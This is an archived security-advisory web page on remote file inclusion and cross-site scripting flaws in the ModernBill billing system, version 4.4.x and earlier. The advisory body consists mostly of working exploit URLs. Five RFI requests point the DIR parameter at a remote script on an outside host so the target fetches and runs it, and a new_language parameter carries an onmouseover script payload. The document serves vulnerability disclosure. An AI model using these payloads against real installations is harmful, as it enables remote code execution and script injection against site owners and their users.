SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

ModernBill <= 4.4.x XSS / Remote File Inclusion Vulnerability


Arrow  SecurityAlert : 4587
Arrow  CVE : CVE-2008-5059
Arrow  CVE : CVE-2008-5060
Arrow  CWE : CWE-79
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
  ExploitAlert :   5035
Arrow  Credit : xc0r3
Arrow  Published : 15.11.2008

Arrow  Affected Software : modernbill:modernbill:2.01
modernbill:modernbill:2.02s
modernbill:modernbill:3.0:beta
modernbill:modernbill:3.1.0
modernbill:modernbill:4.0.1:rc8
modernbill:modernbill:4.0.1:rc7
modernbill:modernbill:4.0.2
modernbill:modernbill:3.1.3
modernbill:modernbill:4.1.1
modernbill:modernbill:4.1.2
modernbill:modernbill:4.1.3
modernbill:modernbill:4.2.1
modernbill:modernbill:4.3.0
modernbill:modernbill:4.3.2
modernbill:modernbill:4.4 and previous versions
modernbill:modernbill:4.4.0 and previous versions



Arrow  Advisory Content :  

***************************************************************************
***********
ModernBill .:. Client Billing System - User Login
ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by
nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
***************************************************************************
***********

rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x
2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.
net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x
2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=htt
p://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.
txt?

xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111
-222-1933email@address.tst&password=111-222-1933email@address.tst&new_langu
age="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit
&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933
email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+

***************************************************************************
***********



Arrow  References :

http://securityreason.com/expldownload/1/5035/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/46512
http://www.milw0rm.com/exploits/6916
http://secunia.com/advisories/32529




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.